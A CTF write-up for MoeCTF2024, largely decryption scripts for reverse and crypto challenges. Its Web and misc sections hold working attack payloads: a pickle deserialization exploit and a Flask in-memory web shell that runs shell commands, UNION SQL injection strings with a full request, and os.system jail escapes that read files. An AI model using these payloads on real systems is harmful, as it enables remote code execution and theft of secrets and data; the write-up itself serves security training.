MoeCTF2024 Writeup
Week4
Reverse
moejvav
```
vmInsn = [0, 1, 60, 2, -20, 6, -25, 0, 1, 60, 2, -20, 6, -27, 0, 1, 60, 2, -20, 6, -33, 0, 1, 60, 2, -20, 6, -31, 0, 1, 60, 2, -20, 6, -50, 0, 1, 60, 2, -20, 6, -36, 0, 1, 60, 2, -20, 6, -39, 0, 1, 60, 2, -20, 6, -24, 0, 1, 60, 2, -20, 6, -52, 0, 1, 60, 2, -20, 6, -29, 0, 1, 60, 2, -20, 6, -52, 0, 1, 14, 2, 5, 6, -64, 0, 1, 14, 2, 5, 6, -58, 0, 1, 14, 2, 5, 6, -63, 0, 1, +210 more]
Exception[] exceptions2 = {new BuDaoLePaoException(), new DxIsNanTongException(), new GenshinImpactException(), new LuoIsNotDogException(), new NotSigninException(), new NullCafeException(), new StarrySkyMeowNotFoundException(), new TokioEatWhatException(), new RuntimeException()};
int i = 0;
int store = 0;
while (i < vmInsn.length) {
int insn = vmInsn[i];
i++;
if (insn == 114514) {
break;
}
try {
throw exceptions2[insn];
// break;
} catch (BuDaoLePaoException e) {
store = array.get(0).byteValue();
array.remove(0);
} catch (DxIsNanTongException e2) {
store ^= vmInsn[i];
System.out.print(" ^" + String.valueOf(vmInsn[i]));
i++;
} catch (GenshinImpactException e3) {
store += vmInsn[i];
System.out.print(" +" + String.valueOf(vmInsn[i]));
i++;
} catch (LuoIsNotDogException e4) {
store &= vmInsn[i];
System.out.print(" &" + String.valueOf(vmInsn[i]));
i++;
} catch (NotSigninException e5) {
store <<= vmInsn[i];
System.out.print(" << " + String.valueOf(vmInsn[i]));
i++;
} catch (NullCafeException e6) {
store |= vmInsn[i];
System.out.println(" | " + String.valueOf(vmInsn[i]));
i++;
} catch (StarrySkyMeowNotFoundException e7) {
System.out.println(" flag[i] shoud be " + String.valueOf(vmInsn[i]));
i++;
// if (store != vmInsn[i]) {
// vmInsn[i] = 7;
// System.out.println("vmInsn[i]=7" );
// }
} catch (TokioEatWhatException e8) {
vmInsn[i] = 8;
System.out.println("vmInsn[i]=8" );
} catch (Exception e9) {
System.out.println("wrong flag, oh no...");
throw new RuntimeException(e9);
}
}
System.out.println("输入的flag正确!");
}
```
4组数据.
第1组 (x ^ 60) + 20
第2组 (x ^ 14) + 5
第3组 (x ^ 10) + 5
第4组 (x + 14) + 10
求解..
def dec1(x):
return (x + 20) ^ 60
def dec2(x):
return (x - 5) ^ 14
def dec3(x):
return (x - 5) ^ 10
def dec4(x):
return (x - 10) - 14
def decode(x):
# b2.byteValue() ^ 202) + 32
x = (x - 32) ^ 202
return x & 0xff
lst1 = [-25, -27, -33, -31, -50, -36, -39, -24, -52, -29, -52]
lst2 = [-64, -58, -63, -52, -90, -39, -43, 26, 25, -49, -64, ]
lst3 = [-51, 25, -45, -55, -47, 24, -41, -60, 22, -40, -60, ]
lst4 = [-15, 50, -51, -31, 50, 50, -35, 50, -35, 51, -17, ]
t1 = [chr(decode(dec1(x))) for x in lst1]
t2 = [chr(decode(dec2(x))) for x in lst2]
t3 = [chr(decode(dec3(x))) for x in lst3]
t4 = [chr(decode(dec4(x))) for x in lst4]
print(''.join(t1+t2+t3+t4))
# moectf{jvav_eXcEpt10n_h4ndl3r_1s_s0_c00o0o1}
sm4
key为 thekeytosomethin 输入时会覆盖首位t
from sm4 import SM4Key
m = bytes.fromhex("AD6CCDC109FCDDEF83AE9308538EC5375CDD1B4B039919A26924964277C1275F2DD45DF52BB032F7A597C68AEE48AE93")
key = b'\x00hekeytosomethin'
key0 = SM4Key(key)
r = key0.decrypt(m)
print(r)
d0tN3t
# ((byte)((int)((byte)text[i] + 114 ^ 114) ^ i * i) != array[i])
array = [173, 146, 161, 174, 132, 179, 187, 234, 231, 244, 177, 161, 65, 13, 18, 12, 166, 247, 229, 207, 125, 109, 67, 180, 230, 156, 125, 127, 182, 236, 105, 21, 215, 148, 92, 18,
199, 137, 124, 38, 228, 55, 62, 164];
for i, c in enumerate(array):
d = ((c ^ (i ** 2)) ^ 114) - 114
print(chr(d & 0xff), end='')
Week3
Crypto
EzMatrix
EzPack
One more bit
Misc
Done | ctfer2077②
核心价值观 p@55w0rd
verycrypt挂载
ntfs流解出 小鹤.txt
ulpb vfde hfyz yisi buuima
key jqui xxmm vedrhx de qrpb xnxp
ulpb ui veyh dazide
小鹤 是双拼。用双拼输出
双拼 真的 很有 意思 不是吗
key 就是 下面 这段话 的 全品 小写
双拼 是 这样 打字的
shuangpinshizheyangdazide
moectf{shuangpinshizheyangdazide}
Done | ez_Forensics
直接搜 moectf
moectf{WWBGY-TLVC5-XKYBZ}
Done | 我的图层在你之上
black文件末尾有 https://ps.gaoding.com/#/
将文件放进入发现多个图层
把黑色导出。stegsolve 看找到 p_w_d
解压得到凯撒 zbrpgs{q751894o-rr0n-47qq-85q4-r92q0443921s}
rot13 bruteforce moectf{d751894b-ee0a-47dd-85d4-e92d0443921f}
拼图羔手
拼图
balabalbalablbalblablbalabala//nihaopintugaoshou//encoded_flag{71517ysd%ryxsc!usv@ucywqosyqxl&sxl*sbys^wb\(syqwp\)ysyw!qpw@hs}
解一下encode.py 得到 # key: StrangeCharacterStaywithNumberOnSomewhere
import base64
from base64 import b64encode as be
def self_decoding(input_text):
code_setting_first="doanythigfruebcjklmqpswvxz"
code_setting_sec="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
number_setting = "0123456789"
tab1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
tab2 = 'tuvwxyzsrqponmlkjihabcdefgHIJKLMNABCDEFGXYZVUTSRQOPQ'
cipher = input_text.translate(str.maketrans(tab2,tab1))
out = list(cipher)
encoded_text = enc_number(out, input_text, number_setting)
return encoded_text
def enc_number(encoded_text, input_text, number_setting):
for i in range(len(input_text)):
if input_text[i] in number_setting:
if i != len(input_text) - 1:
x = int(input_text[i]) ^ int(input_text[i + 1])
encoded_text += str(x) + " "
elif i == len(input_text) - 1:
encoded_text += input_text[-1]
return encoded_text
def self_encoding(input_text):
code_setting_first = "doanythigfruebcjklmqpswvxz"
code_setting_sec = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
number_setting = "0123456789"
encoded_text = " "
for x in input_text:
if x in code_setting_first:
if ord(x) < 104:
num = ord(x) + 19
elif ord(x) > 115:
num = ord(x) - 19
elif 104 <= ord(x) <= 115:
num = 219 - ord(x)
encoded_text += chr(num) + " "
elif x in code_setting_sec:
if 64 < ord(x) < 72:
num = ord(x) + 7
elif 71 < ord(x) < 79:
num = ord(x) - 7
elif 78 < ord(x) < 82:
num = ord(x) + 9
elif 87 < ord(x) < 91:
num = ord(x) - 9
elif 81 < ord(x) < 88:
num = 168 - ord(x)
encoded_text += chr(num) + " "
elif x not in number_setting:
encoded_text += x
for i in range(len(input_text)):
if input_text[i] in number_setting:
if i != len(input_text) - 1:
x = int(input_text[i]) ^ int(input_text[i + 1])
encoded_text += str(x) + " "
elif i == len(input_text) - 1:
encoded_text += input_text[-1]
return encoded_text
def reverse_encoding(input_text):
output_text = input_text[::-1]
return output_text
def strange_character_hint(key):
key = self_encoding(reverse_encoding(key))
res = "".join((key).split(" "))
print(be(res.encode('utf-8')))
"""enjoy the revenge!"""
if __name__ == "__main__":
cip = b'eGl4c2R4bmxVbVhpeHVuYkdzYXJkZnRhVWl4YXZ0aXRzSnh6bXRpYVU='
res1 = reverse_encoding(base64.b64decode(cip))
decoding = self_decoding(res1.decode())
print(''.join(decoding))
# key: StrangeCharacterStaywithNumberOnSomewhere
Done|时光穿梭机
moectf{han_fang_tang}
辣鸡,不要看地图名字,看图片招牌
Han-yi, Feng. ‘Discovery and Excavation of the Royal Tomb of Wang Chien’. Quarterly Bulletin of Chinese Bibliography. N.S. 4 (1944), 1–11 Google Scholar. Te-k'un, Cheng. ‘Royal Tomb of Wang Chien’. H.J.A.S. 8 (1945), 235–41Google Scholar. Michael Sullivan, D.. ‘Excavation of a T'ang Imperial Tomb’. Illus. London News, April 20, 1946 Google Scholar.
pwn
NX_on!
Pwn_it_off!
Read_once_twice!
shellcode_revenge
Where is fmt?
Reverse
Done | Just-Run-It
>0x0.exe
moectf2024@xdsec ~> cat /flag.0
6257396c5933526d657a55355a6d45
└─$ ./0x1.elf
moectf2024@xdsec ~> cat /flag.1
324d444a6a4c5459794e4745744e44
--- 0x2运行结果 SDK 34以上运行
adb: failed to install 0x2.APK: Failure [INSTALL_FAILED_OLDER_SDK: Requires newer sdk version #34 (current version is #31)]
Hello moectf2024!moectf2024@xdsec ~>
cat /flag.2
42694e7930345954566a4c57557a4e
└─$ qemu-riscv64-static 0x3.riscv64.elf
[87, 85, 49, 78, 122, 82, 106, 90, 106, 108, 105, 79, 88, 48, 61]
# bW9lY3RmezU5ZmE2MDJjLTYyNGEtNDBiNy04YTVjLWUzNWU1NzRjZjliOX0=
# moectf{59fa602c-624a-40b7-8a5c-e35e574cf9b9}
Done | rc4
A71A68ECD82711CC8C9B16155CD2673E82ADCE75D4BC5756C28A52B86BD6CCF8A4BA722FE05715B92411
RC4_1s_4w3s0m3
moectf{why_Rc4_haS_The_Rev32sabl3_pr0ceSS}
Done | xor(大嘘)
call $+5 花指令 nop掉
加密流程 Str ^ kvCode -> tea -> ^ v9 == byte_DD4058
解密流程 byte_DD4058 ^ v9 -> decode tea -> ^kvcode
# Crypto_tea_tea.py
# 如果超过8字节 2个一组处理
from Crypto.Util.number import long_to_bytes
def decrypt(v, k):
v0, v1 = v
delta = 0x9E3779B9
# x = sum(delta for _ in range(32)) & 0xFFFFFFFF
x = delta * 32 & 0xffffffff
k0, k1, k2, k3 = k
for i in range(32):
v1 -= ((v0 << 4) + k2) ^ (v0 + x) ^ ((v0 >> 5) + k3)
v1 = v1 & 0xFFFFFFFF
v0 -= ((v1 << 4) + k0) ^ (v1 + x) ^ ((v1 >> 5) + k1)
v0 = v0 & 0xFFFFFFFF
x -= delta
x = x & 0xFFFFFFFF
return [v0, v1]
def step1_xor():
enc = bytes.fromhex('3C0D051F306E1E30043C125259036D5204040B331F33173B171A2B0755045B5A')
v9 = bytes.fromhex('2BF2824148749DAA7E4CDA04082CA8529777B73B162DD4FC60BEC4B673199487')
lst = [a ^ b for a, b in zip(enc, v9)]
return lst
def swap_endian(data):
import struct
if isinstance(data[0], int):
data = bytearray(data)
if len(data) % 4 != 0:
data += b'\x00' * (4 - len(data) % 4)
res = []
for i in range(0, len(data), 4):
v = struct.unpack('<I', data[i:i + 4])[0]
res.append(v)
return res
def step2_tea(values):
from Crypto_tea_tea import decrypt
import struct
result = b''
for i in range(0, len(values), 2):
key = [0x6C6C6568, 0x6F6D5F6F, 0x66746365, 0x34323032]
v = values[i:i + 2]
r = decrypt(v, key)
a,b = r # type:int,int
ra,rb = struct.pack('<I', a),struct.pack('<I', b)
result += ra + rb
return result
def step3_xor(lst):
xor = bytes.fromhex('68656C6C6F5F6D6F6563746632303234')
enc = lst
lst = []
for a, b in zip(enc, xor + xor):
r = a ^ b
lst.append(r)
return lst
lst = step1_xor()
r1 = swap_endian(lst)
r2 = step2_tea(r1)
r3 = step3_xor(r2)
print(bytearray(r3))
# moectf{how_an_easy_junk_and_tea}
Done | xxtea
import xxtea
enc = bytes.fromhex('64F5E178E1F035A834FF1205FB13E9B050A3B989B1DA43C94FC8DB0120DB16AFED671796')
key = (bytes.fromhex('6D6F65637466323032342121BBBBFFCC') + b'\x00' * 16)[:16]
print(xxtea.decrypt(bytes(enc), bytes(key), padding=False))
Done | xtea
def decrypt(rounds, v, k):
v0 = v[0]
v1 = v[1]
delta = -0x33004445
x = delta * rounds
x = x & 0xFFFFFFFF
for i in range(rounds):
v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (x + k[(x >> 11) & 3])
v1 = v1 & 0xFFFFFFFF
x -= delta
x = x & 0xFFFFFFFF
v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (x + k[x & 3])
v0 = v0 & 0xFFFFFFFF
return [v0, v1]
if __name__ == '__main__':
# byte_7FF715F72000 = A3699626BD780B3D9DA52862
# lst = [0x269669A3, 0x3D0B78BD, 0x6228A59D]
# 程序先进行 前2个4字节加密, 再用后2个4字节加密.倒过来即可
key = [2,0,2,4]
rounds = 32
e2 = [0x3D0B78BD, 0x6228A59D]
decrypted = decrypt(rounds, e2, key)
print([hex(x) for x in decrypted])
v_enc1 = decrypted[0]
e1 = [0x269669A3, v_enc1]
decrypted = decrypt(rounds, e1, key)
print([hex(x) for x in decrypted])
"""
['0x60c0d6e0', '0x21213432']
['0x63656f6d', '0x30326674']
0x63656f6d 0x30326674 0x21213432
"""
moectf{moectf2024!!}
Web
Done|who's blog
/?id={{}}
/console
import os
os.environ
Done|PetStore
python反序列化内存马
gASVcAAAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlIxUaW1wb3J0IG9zO2dsb2JhbCBzdG9yZTtraz1zdHIob3MuZW52aXJvbik7cGV0ID0gUGV0KGtrLCAnc3MnKTtzdG9yZS5wZXRzLmFwcGVuZChwZXQplIWUUpQu
import pickle
import os
import base64
class A(object):
def __reduce__(self):
return (exec, ("import os;global store;kk=str(os.environ);pet = Pet(kk, 'ss');store.pets.append(pet)",))
a = A()
pickle_a = pickle.dumps(a)#序列化
print(pickle_a)
# pickle.loads(pickle_a) #反序列化时触发了代码执行
print(base64.b64encode(pickle_a))
"""
内存马: 需要执行2次 ,先执行下面的
return (exec, ("__import__('sys').modules['__main__'].__dict__['app'].view_functions.update({'shell': lambda:__import__('os').popen(__import__('sys').modules['__main__'].__dict__['app'].request_context.__globals__['request_ctx'].request.args.get('cmd', 'whoami')).read()})",))
# return (eval, ("__import__('sys').modules['__main__'].__dict__['app'].url_map.add(app.url_rule_class('/flask-shell', methods=['GET'],endpoint='shell'))",))
"""
'''
方法三:写入static文件
cmd = "mkdir static;env>>static/666.txt" # 访问http://127.0.0.1:4433/static/666.txt
'''
Done|smbms
辣鸡提示:放轻松,想要 sql 注入?PrepareStatement 是不会让你们轻易得逞的
666' union select 1,(database()),3,4,5,6,7,8,9,10,11,12,13,'9527
666' union select 1,(select group_concat(table_name) from information_schema.tables),3,4,5,6,7,8,9,10,11,12,13,'9527
666' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'),3,4,5,6,7,8,9,10,11,12,13,'9527
666' union select 1,(select flag from flag),3,4,5,6,7,8,9,10,11,12,13,'9527
GET /jsp/user.do?method=query&queryName=666'%20%20union%20select%201%2c(select%20flag%20from%20flag)%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c'9527&queryUserRole=0&pageIndex=1 HTTP/1.1
Host: 127.0.0.1:3248
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:3248/jsp/user.do?method=query&queryName=666%27++union+select+1%2C%28group_concat%28table_name%29+from+information_schema.tables%29%2C9527%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C%27r&queryUserRole=0&pageIndex=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: verify=user; PHPSESSID=8d5643dbf3b034504b084eb45740b2b2; session=eyJjb2luIjpbMl0sImNvaW5fY291bnQiOjEsInBsYXllciI6ImQiLCJyb3VuZCI6LTEsInRpbWUiOjE3MjQwNDQ2MzMuMDIyNzEyfQ.ZsLVXg.7jD-C1iXRqEOkSkx-uSRx39LWgc; retainlogin=1; __wzd5cc1c8e9ac487aaec440=1724385077|00730c0a3b30; __wzd30287248c4b7b7137545=1724401549|03b8e06b5b8f; token=06338259-449b-4f70-863b-20c67e647c72; JSESSIONID=D97CDA83C5541A111C6FD777B794BA90
Connection: close
Week2
reverse
[Week1] 逆向工程入门指北
lst = [ 123, 121, 115, 117, 98, 112, 109, 100, 37, 96, 37, 100, 101, 37, 73, 39,
101, 73, 119, 73, 122, 121, 120, 113, 73, 122, 121, 120, 113, 73, 97, 119,
111, 73, 98, 121, 73, 115, 110, 102, 122, 121, 100, 115, 107, 22 ];
for e in lst:
print(chr(e^22), end='')
# moectf{r3v3rs3_1s_a_long_long_way_to_explore}
[Week1] xor
494B414750425F411C164610131C40094216461C091010421D09461514140917161441404016144712401459000000000000000000000000
Cyberchef
moectf{e82b478d-f2b8-44f9-b100-320edd20c6d0}
[Week1] upx
upx 4.24 解压 得flag
moectf{ec5390dd-f8cf-4b02-bc29-3bb0c5604c29}
[Week1] upx-revenge.exe
UPX变形,010将 vmp替换为UPX. upx -d file.exe
ida一看得到flag
moectf{554ea35c-a1bb-4d8f-a323-bd697564bf27}
secretmodule
customize.sh 用Cyberchef解下。得到
testk() {
echo "Welcome to the Secret module!But before you begin,you need to prove your self."
(/system/bin/getevent -lc 1 2>&1 | /system/bin/grep VOLUME | /system/bin/grep " DOWN" > $MODPATH/events) || return 1
return 0
}
choose() {
while true; do
/system/bin/getevent -lc 1 2>&1 | /system/bin/grep VOLUME | /system/bin/grep " DOWN" > $MODPATH/events
if (`cat $MODPATH/events 2>/dev/null | /system/bin/grep VOLUME >/dev/null`); then
break
fi
done
if (`cat $MODPATH/events 2>/dev/null | /system/bin/grep VOLUMEUP >/dev/null`); then
echo "114514"
else
echo "1919810"
fi
}
if testk; then
ui_print "Great! Now enter the secret."
else
ui_print "Legacy Device. Use a newer device to do this challenge"
exit
fi
concatenated=""
for i in 1 2 3 4 5 6 7
do
result=$(choose)
concatenated="${concatenated}${result}"
done
input_str=$(echo -n $concatenated | md5sum | awk '{print $1}')
sec="77a58d62b2c0870132bfe8e8ea3ad7f1"
if test $input_str = $sec
then
echo 'You are right!Flag is'
echo "moectf{$concatenated}"
else
echo 'Wrong. Try again.'
exit
fi
循环7次 按音量上就输出 "114514" 否则 输出 "1919810"
最终md5为 77a58d62b2c0870132bfe8e8ea3ad7f1 爆破即可。
from itertools import product
import hashlib
sec = "77a58d62b2c0870132bfe8e8ea3ad7f1"
tp = "114514", "1919810"
for x in product(tp, repeat=7):
s = "".join(x)
if hashlib.md5(s.encode()).hexdigest() == sec:
print(s)
exit(0)
moectf{114514114514191981011451411451419198101919810}
逆向工程进阶之北
// 0xccffbbbb 的模反元素 0x8d61d173
// import gmpy2 ; print(hex(gmpy2.invert(0xccffbbbb, 0xffffffff + 1)))
#include <iostream>
int main() {
unsigned int a[] = {0xb5073388, 0xf58ea46f, 0x8cd2d760, 0x7fc56cda, 0x52bc07da, 0x29054b48, 0x42d74750, 0x11297e95,
0x5cf2821b, 0x747970da, 0x64793c81};
for (int i = 0; i < 11; i++) {
*(a + i) = ((*(a + i) ^ (0xd3906 + 0xdeadbeef)) - 0xdeadc0de) * 0x8D61D173;
}
unsigned char *bytes = reinterpret_cast<unsigned char *>(a);
for (int i = 0; i < 44; i++) {
printf("%c", bytes[i]);
}
std::cout << std::endl;
return 0;
}
moectf{c5f44c32-cbb9-444e-aef4-c0fa7c7a6b7a}
dynamic
...
v9[47] = 0xD1;
key[0] = 0xCAFEBABE;
key[1] = 0xDEADC0DE;
key[2] = 0xD3906;
key[3] = 0x114514;
tea((__int64)v9, 0xFFFFFFF4i64, (__int64)key);
vprintf("What happened to my Flag?\n", v5);
tea((__int64)v9, 12i64, (__int64)key);
vprintf("Your Flag has REencrypted.", v6);
第一次tea加密的返回处断下查看v9内存值得到flag
moectf{18d4c944-947c-4808-9536-c7d34d6b3827}
moeprotector
titan 隐藏.手动处理异常改跳转. 一步一步分析还原算法
enc = bytes.fromhex('C7C4C9CEC2D18B666B8DB045F984FFB251ABB34C33A8610EC53B5BF911828B8E7A23687A211F8791468D90A4A5E035D9414E44F137AF263A8F')
def step1_encrypt(n, lst):
l = []
for i, c in enumerate(lst):
d = (c ^ (i + n)) + 20
l.append(d & 0xff)
return l
def step1(n):
lst = []
for i, c in enumerate(enc):
d = (c - 20) ^ (i + n)
lst.append(d & 0xff)
return lst
def step2_encrypt(Str, k1):
if isinstance(Str, str):
Str = list(Str.encode())
for i in range(0, 56, 4):
seq = [i, i + 1, i + 2, i + 3]
key_const = [0x14, 0x14, 0x14, 0x14]
chars = Str[i:i + 4]
# sum1
sum1 = [a + b for a, b in zip(seq, k1)]
xor2 = [a ^ b for a, b in zip(sum1, chars)]
res3 = [a + b for a, b in zip(xor2, key_const)]
print([chr(x) for x in res3])
Str[i:i + 4] = res3
# print(bytes(Str).hex().upper())
return Str
def pad(Str):
l = len(Str)
quotient, remainer = divmod(l, 4)
if remainer:
Str = Str + [0] * (4 - remainer)
return Str
def step2_decrypt(Str, k1):
if isinstance(Str, str):
Str = list(Str.encode())
# print(bytes(Str).hex().upper())
for i in range(0, 57, 4):
seq = [i, i + 1, i + 2, i + 3]
key_const = [0x14, 0x14, 0x14, 0x14]
chars = Str[i:i + 4]
xor2 = [(a - b) & 0xff for a, b in zip(chars, key_const)]
sum1 = [(a + b) & 0xff for a, b in zip(seq, k1)]
txt = [(a ^ b) & 0xff for a, b in zip(xor2, sum1)]
Str[i:i + 4] = txt
return Str
k1 = [0x15, 0x15, 0x15, 0x15]
k2 = [0x1A, 0x1A, 0x1A, 0x1A]
k3 = [0x19, 0x19, 0x19, 0x19]
res3 = list(enc)
res3[56] = (res3[56] ^ (56 + 25)) + 20
res2 = step2_decrypt(res3, k3)
res2[56] = (res2[56] ^ (56 + 26)) + 20
res = step2_decrypt(res2, k2)
res[56] = (res[56] ^ (56 + 21)) + 20
text = step2_decrypt(res, k1)
print(bytes(text))
moedaily
tea加密.每组需要解2次.
from Crypto.Util.number import long_to_bytes
def encrypt(v, k):
v0, v1 = v
x = 0
delta = 0x9E3779B9
k0, k1, k2, k3 = k
for i in range(32):
x += delta
x = x & 0xFFFFFFFF
v0 += ((v1 << 4) + k0) ^ (v1 + x) ^ ((v1 >> 5) + k1)
v0 = v0 & 0xFFFFFFFF
v1 += ((v0 << 4) + k2) ^ (v0 + x) ^ ((v0 >> 5) + k3)
v1 = v1 & 0xFFFFFFFF
return [v0, v1]
def decrypt(v, k):
v0, v1 = v
delta = 114514
# x = sum(delta for _ in range(32)) & 0xFFFFFFFF
round = 32
x = delta * round & 0xffffffff
k0, k1, k2, k3 = k
for i in range(round):
v1 -= ((v0 << 4) + k2) ^ (v0 + x) ^ ((v0 >> 5) + k3)
v1 = v1 & 0xFFFFFFFF
v0 -= ((v1 << 4) + k0) ^ (v1 + x) ^ ((v1 >> 5) + k1)
v0 = v0 & 0xFFFFFFFF
x -= delta
x = x & 0xFFFFFFFF
return [v0, v1]
def decode(v):
key = [114514, 1919810, 415144, 19883]
v = decrypt(v, key)
v = decrypt(v, key)
r1 = long_to_bytes(v[0])[::-1]
r2 = long_to_bytes(v[1])[::-1]
print((r1+r2).decode())
if __name__ == '__main__':
lst = [
[ 1397140385, 2386659843],
[ 962571399, 3942687964],
[ 3691974192, 863943258],
[ 216887638, 3212824238],
[ 3802077983, 1839161422],
[ 1288683919, 3222915626],
]
for v in lst:
decode(v)
Misc
罗小黑
moectf{y0uu6r3th3m0st3r1nth1sf13ld}
gif 二维码
ezF5
java Extract lopez.jpg -p no_password
moectf{F5_15_s0_lntere5t1n9}
ctfer2077①
zsteg -a qrcode.png
moectf{84d7f247-3cba-4077-ba25-079f3ac7bb8a}
boss rabbit
文件头修复为FFD8 看到 {Welc0me_t0_the_sec
010查看找到 key???cmV0X2xpZmVfMGZfTWlzYyE=
删问号解出来为 ret_life_0f_Misc!
moectf{Welc0me_t0_the_secret_life_0f_Misc!}
解不完的压缩包
脚本解出最后的zip文件.
cccccccrc.zip 进行crc32爆破 pwd1-4按顺序拼接为解压密码
moectf{af9c688e-e0b9-4900-879c-672b44c550ea}
moejail_lv1
f'{__import__("os").system("ls -a /tmp")}'
f'{__import__("os").system("cat /tmp/.t*")}'
The upside and down
16进制反转是个二维码png 89 50 4E 47
moectf{Fri3nds_d0n't_lie!}
readme
/proc/1/cmdline 查看源码
/proc/1/fd/3 查看读取flag文件的对象
每人至少300份
127236589
127236592 忘了是哪个数字拼的 , 拼图解码得到
balabalballablblablbalablbalballbase58lblblblblllblblblblbalblbdjshjshduieyrfdrpieuufghdjhgfjhdsgfsjhdgfhjdsghjgfdshjgfhjdgfhgdh///key{3FgQG9ZFteHzw7W42}??
上面有个base58.
把 3FgQG9ZFteHzw7W42 用base58解出得到 we1rd_qrc0d3
moectf{we1rd_qrc0d3}
捂住一只耳
63 31 43 31 41 52 31 51 71 101
没出来flag moectf{MOECTF_63_31_43_31_41_52_31_51_71_101}不对
键盘上描绘出独属于字母的坐标图QAQ 快去试试吧!
moectf{NEVERGETUP}
findit
moectf{ji_di_bao_you_er_yuan}
西安 雄峰 桔子水晶酒店
CRYPT
More_secure_RSA
import gmpy2
from Crypto.Util.number import *
'''
N = n * r
'''
c = 12992001402636687796268040906463852467529970619872166160007439409443075922491126428847990768804065656732371491774347799153093983118784555645908829567829548859716413703103209412482479508343241998746249393768508777622820076455330613128741381912099938105655018512573026861940845244466234378454245880629342180767100764598827416092526417994583641312226881576127632370028945947135323079587274787414572359073029332698851987672702157745794918609888672070493920551556186777642058518490585668611348975669471428437362746100320309846155934102756433753034162932191229328675448044938003423750406476228868496511462133634606503693079
n = 16760451201391024696418913179234861888113832949815649025201341186309388740780898642590379902259593220641452627925947802309781199156988046583854929589247527084026680464342103254634748964055033978328252761138909542146887482496813497896976832003216423447393810177016885992747522928136591835072195940398326424124029565251687167288485208146954678847038593953469848332815562187712001459140478020493313651426887636649268670397448218362549694265319848881027371779537447178555467759075683890711378208297971106626715743420508210599451447691532788685271412002723151323393995544873109062325826624960729007816102008198301645376867
C = 1227033973455439811038965425016278272592822512256148222404772464092642222302372689559402052996223110030680007093325025949747279355588869610656002059632685923872583886766517117583919384724629204452792737574445503481745695471566288752636639781636328540996436873887919128841538555313423836184797745537334236330889208413647074397092468650216303253820651869085588312638684722811238160039030594617522353067149762052873350299600889103069287265886917090425220904041840138118263873905802974197870859876987498993203027783705816687972808545961406313020500064095748870911561417904189058228917692021384088878397661756664374001122513267695267328164638124063984860445614300596622724681078873949436838102653185753255893379061574117715898417467680511056057317389854185497208849779847977169612242457941087161796645858881075586042016211743804958051233958262543770583176092221108309442538853893897999632683991081144231262128099816782478630830512
N = 1582486998399823540384313363363200260039711250093373548450892400684356890467422451159815746483347199068277830442685312502502514973605405506156013209395631708510855837597653498237290013890476973370263029834010665311042146273467094659451409034794827522542915103958741659248650774670557720668659089460310790788084368196624348469099001192897822358856214600885522908210687134137858300443670196386746010492684253036113022895437366747816728740885167967611021884779088402351311559013670949736441410139393856449468509407623330301946032314939458008738468741010360957434872591481558393042769373898724673597908686260890901656655294366875485821714239821243979564573095617073080807533166477233759321906588148907331569823186970816432053078415316559827307902239918504432915818595223579467402557885923581022810437311450172587275470923899187494633883841322542969792396699601487817033616266657366148353065324836976610554682254923012474470450197
e = 0x10001
r = N // n
C2 = C % r
phi = r-1
d = gmpy2.invert(e, phi)
m = pow(C2, d, r)
print(long_to_bytes(m))
指北
rsa
moectf{the_way_to_crypto}
Signin
var('q p')
pq = (p-1)*(q-2) == 18047017539289114275195019384090026530425758236625347121394903879980914618669633902668100353788910470141976640337675700570573127020693081175961988571621759711122062452192526924744760561788625702044632350319245961013430665853071569777307047934247268954386678746085438134169871118814865536503043639618655569687154230787854196153067547938936776488741864214499155892870610823979739278296501074632962069426593691194105670021035337609896886690049677222778251559566664735419100459953672218523709852732976706321086266274840999100037702428847290063111455101343033924136386513077951516363739936487970952511422443500922412450462
qp = (q-1)*(p-2) == 18047017539289114275195019384090026530425758236625347121394903879980914618669633902668100353788910470141976640337675700570573127020693081175961988571621759711122062452192526924744760561788625702044632350319245961013430665853071569777307047934247268954386678746085438134169871118814865536503043639618655569687077087914198877794354459669808240133383828356379423767736753506794441545506312066344576298453957064590180141648690226266236642320508613544047037110363523129966437840660693885863331837516125853621802358973786440314619135781324447765480391038912783714312479080029167695447650048419230865326299964671353746764860
p_q = p + q == 279533706577501791569740668595544511920056954944184570513187478007551195831693428589898548339751066551225424790534556602157835468618845221423643972870671556362200734472399328046960316064864571163851111207448753697980178391430044714097464866523838747053135392202848167518870720149808055682621080992998747265496
solve([pq, qp, p_q], p,q)
moectf{Just_4_signin_ch4ll3ng3_for_y0u}'
big and small
flag{xt>is>s>b}
c = 150409620528288093947185249913242033500530715593845912018225648212915478065982806112747164334970339684262757
e = 3
n = 20279309983698966932589436610174513524888616098014944133902125993694471293062261713076591251054086174169670848598415548609375570643330808663804049384020949389856831520202461767497906977295453545771698220639545101966866003886108320987081153619862170206953817850993602202650467676163476075276351519648193219850062278314841385459627485588891326899019745457679891867632849975694274064320723175687748633644074614068978098629566677125696150343248924059801632081514235975357906763251498042129457546586971828204136347260818828746304688911632041538714834683709493303900837361850396599138626509382069186433843547745480160634787
i = 0
s = time.clock()
while 1:
m, b = gmpy2.iroot(c + i * n, e)
if b:
print('[-]m is:', m)
print('[!]Timer:', round(time.clock() - s, 2), 's')
print('[!]All Done!')
# 省赛2023
print(libnum.n2s(m))
break
i += 1
ezhash
*moectf{*2100360168}
from itertools import product
from hashlib import sha256
secrets=b'2100'
hash_value = sha256(secrets).hexdigest()
print(hash_value)
